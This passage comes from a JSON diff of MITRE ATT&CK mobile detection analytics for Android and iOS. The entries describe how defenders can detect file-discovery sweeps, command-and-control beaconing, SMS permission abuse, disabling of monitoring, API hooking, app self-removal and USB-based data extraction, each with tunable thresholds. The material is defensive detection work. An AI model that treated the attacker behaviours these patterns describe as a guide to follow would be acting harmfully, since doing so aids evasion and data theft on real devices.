+                    "description": "Defender observes an app (package/UID) issuing high-rate directory or content-index enumerations against external/shared storage or other apps\u2019 Documents/Media providers (logcat:ContentResolver, logcat:StorageAccessFramework), followed within a short window by bulk READ handles or stat/list calls over many distinct paths (logcat:FileIO). Activity occurs without foreground UI or exceeds typical per-app baseline, indicating automated file/dir discovery rather than user-driven browsing. Correlate on package/UID/profile and time proximity.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "android:logcat",
+                            "channel": "query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "android:logcat",
+                            "channel": "ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "android:logcat",
+                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:logcat",
+                            "channel": "READ_EXTERNAL_STORAGE / MANAGE_EXTERNAL_STORAGE permission present or toggled at runtime"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Time window to correlate API queries with file listings (e.g., 30\u2013300s)."
+                        },
+                        {
+                            "field": "MinDistinctPaths",
+                            "description": "Minimum unique paths accessed to qualify as discovery (e.g., \u226550)."
+                        },
+                        {
+                            "field": "BackgroundOnly",
+                            "description": "Require app to be backgrounded to reduce user-driven noise."
+                        },
+                        {
+                            "field": "TargetPathRegex",
+                            "description": "Scope to enterprise-relevant locations (e.g., /Documents, /Android/media/<corp>)."
+                        },
+                        {
+                            "field": "AllowlistedPackages",
+                            "description": "Backup/DLP/security apps expected to enumerate broadly."
+                        },
+                        {
+                            "field": "ProfileScope",
+                            "description": "Limit to Work Profile to reduce personal data noise."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-02-18 18:06:39.579000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--0048442c-54c9-4816-a2ba-5e9d376d0bf2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.375000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0682#AN1789",
+                            "external_id": "AN1789"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1789",
+                    "description": "Defender observes an app (bundle/process) performing large-scope directory listings or metadata reads via FileProvider/NSFileManager against user-visible containers (Files app locations, iCloud/On-My-iPhone) or external providers, with rapid traversal across many folders while the app is backgrounded or without corresponding UI activity (unifiedlogs:FileProvider, unifiedlogs:FileIO). Optional signals include Photo library or document picker bulk enumeration absent recent user gesture. Correlate on bundle/process/profile and path volume within a bounded window.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "iOS:unifiedlog",
+                            "channel": "enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
+                            "name": "iOS:unifiedlog",
+                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+                            "name": "iOS:unifiedlog",
+                            "channel": "UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindowSeconds",
+                            "description": "Correlation window between enumeration API calls and path bursts (e.g., 30\u2013300s)."
+                        },
+                        {
+                            "field": "MinDistinctPaths",
+                            "description": "Minimum number of unique paths to flag discovery (e.g., \u226540)."
+                        },
+                        {
+                            "field": "TargetPathRegex",
+                            "description": "Enterprise-relevant containers/providers to include/exclude."
+                        },
+                        {
+                            "field": "RequireBackgroundState",
+                            "description": "Set true to require background discovery for higher confidence."
+                        },
+                        {
+                            "field": "AllowlistedBundles",
+                            "description": "Legitimate backup/DLP/file-management apps to suppress."
+                        },
+                        {
+                            "field": "ManagedProfileScope",
+                            "description": "Limit to managed devices/profiles."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.375000+00:00\", \"old_value\": \"2026-02-18 19:33:15.080000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--d11da2b2-1552-4a54-b268-3df1cb877cf6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.382000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0685#AN1793",
+                            "external_id": "AN1793"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1793",
+                    "description": "A defender observes an application establishing application-layer network sessions (e.g., HTTP(S), WebSocket, DNS, SMTP/IMAP) with destinations and request patterns that deviate from the enterprise baseline for that app category, especially when sessions occur during background execution or while the device is locked and exhibit beacon-like periodicity, anomalous SNI/Host patterns, or suspicious request/response size symmetry consistent with command polling and tasking over legitimate-looking protocols.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "BeaconIntervalVarianceThreshold",
+                            "description": "Defines acceptable periodicity variance for network communications"
+                        },
+                        {
+                            "field": "ConnectionFrequencyThreshold",
+                            "description": "Baseline-dependent threshold for anomalous connection rates"
+                        },
+                        {
+                            "field": "PayloadEntropyThreshold",
+                            "description": "Defines anomaly conditions for encoded or structured payload content"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.382000+00:00\", \"old_value\": \"2026-03-04 23:55:34.960000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--9396ec3f-2189-44d1-9c88-53ee3603236c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0685#AN1794",
+                            "external_id": "AN1794"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1794",
+                    "description": "A defender observes an application generating application-layer communications that blend with normal traffic (HTTP(S), WebSocket, DNS, mail protocols) but show deviations from enterprise baselines for that bundle ID\u2014such as persistent background network sessions, regular low-volume polling intervals, anomalous SNI/Host destinations, uncommon DNS patterns, or uniform request/response sizing\u2014suggesting command and control over legitimate-looking protocols without relying on tool signatures.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer protocol traffic exhibiting beacon-like periodicity, anomalous session structure, or protocol misuse patterns"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "CadenceAnomalyThreshold",
+                            "description": "Defines acceptable deviation in protocol communication timing"
+                        },
+                        {
+                            "field": "SessionPersistenceThreshold",
+                            "description": "Baseline deviation tolerance for long-lived sessions"
+                        },
+                        {
+                            "field": "AppNetworkBehaviorBaseline",
+                            "description": "Expected mapping of application functionality to protocol usage"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-03-04 23:56:19.093000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--421fc6dc-1275-4eca-9950-150ad27d9bfd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.377000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0686#AN1795",
+                            "external_id": "AN1795"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1795",
+                    "description": "OLD: Application vetting services could look for `android.permission.READ_SMS` in an Android application\u2019s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. \nOn Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary.\n\nNEW: A defender observes an Android application requesting for `android.permission. READ_SMS` and/or ` android.permission. RECEIVE_SMS `, which may also be listed in the application's manifest file. ",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "Application granted or retaining the READ_SMS or RECEIVE_SMS permission."
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.377000+00:00\", \"old_value\": \"2026-03-23 22:55:59.738000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--e13d662d-a496-4997-b26a-39e71eb17fc2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.383000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0687#AN1797",
+                            "external_id": "AN1797"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1797",
+                    "description": "Correlates (1) application-driven modification of device security posture or monitoring capability (e.g., accessibility abuse, disabling security app components, altering monitoring configuration), (2) immediate degradation or cessation of expected telemetry sources such as mobile EDR, sensor visibility, or system monitoring, and (3) subsequent application activity continuing with reduced observability. The defender observes a causal chain where defensive visibility or enforcement is altered first, followed by continued execution under reduced monitoring conditions.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "ecurity or monitoring application transitions to disabled, inactive, or non-reporting state while other applications remain active"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between configuration change, telemetry degradation, and subsequent activity"
+                        },
+                        {
+                            "field": "ExpectedTelemetrySources",
+                            "description": "Baseline set of telemetry sources expected to report continuously (EDR, sensor feeds, monitoring services)"
+                        },
+                        {
+                            "field": "TelemetryGapThreshold",
+                            "description": "Duration or volume threshold defining abnormal loss of telemetry"
+                        },
+                        {
+                            "field": "AllowedAppList",
+                            "description": "Applications legitimately capable of modifying device configuration or security posture"
+                        },
+                        {
+                            "field": "CriticalControlSet",
+                            "description": "Set of security-relevant controls considered high-impact if altered (EDR, accessibility, admin APIs)"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to confirm continued activity during telemetry loss"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.383000+00:00\", \"old_value\": \"2026-04-24 20:30:37.215000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--90052e39-40c3-4194-a2a2-fc240639ab0f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.380000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0689#AN1800",
+                            "external_id": "AN1800"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1800",
+                    "description": "Correlates (1) modification or replacement of system runtime libraries or API resolution paths, (2) repeated invocation of hijacked APIs across multiple applications, and (3) inconsistent or suppressed outputs from those APIs compared to expected OS-enforced behavior. The defender observes a causal chain where system-level API behavior is altered, resulting in multiple applications exhibiting consistent anomalies in sensor access, permission checks, or system state reporting.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window across multiple applications invoking affected APIs"
+                        },
+                        {
+                            "field": "SensitiveAPISet",
+                            "description": "Set of APIs monitored for integrity (e.g., location, telephony, permission checks)"
+                        },
+                        {
+                            "field": "CrossAppConsistencyThreshold",
+                            "description": "Number of applications required to exhibit anomalous API behavior to trigger detection"
+                        },
+                        {
+                            "field": "ExpectedAPIBaseline",
+                            "description": "Baseline of expected API return values or behavior patterns per device state"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.380000+00:00\", \"old_value\": \"2026-04-13 18:04:23.913000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--176d2eda-e41b-48d0-b66a-daaccb5a77cd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.376000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0690#AN1801",
+                            "external_id": "AN1801"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1801",
+                    "description": "Correlates (1) a malicious application gaining or using a removal-capable control path, such as device owner or delegated app-management authority, accessibility service control over uninstall UI, or rooted filesystem access, (2) initiation of uninstall or package-removal behavior, and (3) disappearance of the application from installed-state inventory or app runtime immediately afterward, often with a short-lived final burst of local cleanup or outbound communication. The defender observes a causal chain where the application first establishes the ability to remove itself, then triggers uninstall or deletion, and then vanishes from expected app presence while device activity continues.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between uninstall-capable control, removal action, and app disappearance"
+                        },
+                        {
+                            "field": "RemovalAuthoritySet",
+                            "description": "Roles or privileges considered capable of enabling silent or assisted uninstall, such as device owner, delegated app-management authority, accessibility, or rooted filesystem access"
+                        },
+                        {
+                            "field": "AllowedRemovalApps",
+                            "description": "Legitimate enterprise or device-management apps allowed to uninstall applications"
+                        },
+                        {
+                            "field": "RemovalAttemptSignalSet",
+                            "description": "Signals used to recognize uninstall initiation, such as package-removal actions, uninstall intent flows, or accessibility-driven confirmation steps"
+                        },
+                        {
+                            "field": "DisappearanceThreshold",
+                            "description": "Maximum time between removal action and loss of installed-state visibility"
+                        },
+                        {
+                            "field": "UplinkBytesThreshold",
+                            "description": "Outbound traffic threshold used to confirm final activity before self-removal"
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.376000+00:00\", \"old_value\": \"2026-04-24 20:30:17.842000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a69cefd7-02e8-4840-a26e-2ea0b6a95812",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0691#AN1802",
+                            "external_id": "AN1802"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1802",
+                    "description": "Defender correlates a causal chain where a device transitions into USB debugging or file transfer mode after a physical connection event, followed by application installation, file replication, or execution originating from the USB interface rather than the application store ecosystem.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "android:MDMLog",
+                            "channel": "device USB mode change (charging to file transfer / debugging / accessory)"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
+                            "name": "android:MDMLog",
+                            "channel": "ADB_DEBUGGING_ENABLED"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application installed from adb, sideload, or unknown USB source"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "large file write originating from /mnt/usb or external mounted storage"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "TimeWindow",
+                            "description": "Correlation window between USB connection state change and application installation."
+                        },
+                        {
+                            "field": "AllowedDeveloperDevices",
+                            "description": "List of devices legitimately allowed to use ADB debugging."
+                        },
+                        {
+                            "field": "AllowedSideloadApps",
+                            "description": "Approved enterprise apps allowed to install outside Google Play."
+                        },
+                        {
+                            "field": "FileReplicationThreshold",
+                            "description": "Volume of file writes from mounted external storage considered suspicious."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "Android"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.381000+00:00\", \"old_value\": \"2026-03-10 15:33:30.111000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "x-mitre-analytic",
+                    "id": "x-mitre-analytic--a8133527-5402-49e0-a9f1-14ee4fb2dd3f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.381000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0691#AN1803",
+                            "external_id": "AN1803"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Analytic 1803",
+                    "description": "Defender correlates a chain where a device establishes a new trusted USB host pairing or enters developer/debug configuration state, followed by device data extraction activity, configuration manipulation, or abnormal application behavior shortly after the pairing event.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "mobile-attack"
+                    ],
+                    "x_mitre_log_source_references": [
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
+                            "name": "iOS:MDMLog",
+                            "channel": "Developer Mode enabled, supervised-device restriction changed, or trust-related protected device posture changed"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6",
+                            "name": "iOS:MDMLog",
+                            "channel": "Trusted computer / host relationship established or relevant device trust setting changed"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6",
+                            "name": "iOS:MDMLog",
+                            "channel": "Device risk, compliance, or security posture changes after trusted host pairing or developer-state transition"
+                        },
+                        {
+                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_mutable_elements": [
+                        {
+                            "field": "PairingEventWindow",
+                            "description": "Time window between trusted host pairing and suspicious device behavior."
+                        },
+                        {
+                            "field": "AllowedTrustedHosts",
+                            "description": "Enterprise-authorized computers permitted to pair with managed devices."
+                        },
+                        {
+                            "field": "DeveloperModePolicy",
+                            "description": "Whether developer mode is permitted in the organization."
+                        }
+                    ],
+                    "x_mitre_platforms": [
+                        "iOS"
+                    ],
+                    "x_mitre_version": "1.1",
